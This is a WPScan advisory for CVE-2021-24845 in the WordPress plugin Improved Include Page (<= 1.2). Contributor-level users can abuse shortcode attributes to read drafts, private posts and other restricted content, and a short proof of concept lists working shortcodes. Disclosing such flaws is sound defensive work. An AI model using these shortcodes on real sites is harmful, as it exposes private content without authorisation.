logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Improved Include Page <= 1.2 - Contributor+ Arbitrary Posts/Pages Access

Description

The plugin allows passing shortcode attributes with post_type & post_status which can be used to retrieve arbitrary content. This way, users with a role as low as Contributor can gain access to content they are not supposed to.

Proof of Concept

[include-page allowtype="post" allowstatus="draft" id="131"]
[include-page allowtype="post" allowstatus="private" id="132"]

[include-page allowtype="custon-post-type" allowstatus="any" id="{ID}"]

Affects Plugins

improved-include-page

No known fix - plugin closed

References

CVE

CVE-2021-24845

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CWE-284

Miscellaneous

Original Researcher

Francesco Carlucci

Submitter

Francesco Carlucci

Submitter website

https://carluc.ci

Submitter twitter

francecarlucci

Verified

Yes

WPVDB ID

ab857454-7c7c-454d-9c7f-1db767961e5f

Timeline

Publicly Published

2021-11-15 (about 19 days ago)

Added

2021-11-15 (about 19 days ago)

Last Updated

2021-11-15 (about 19 days ago)

Our Other Services

WPScan WordPress Security Plugin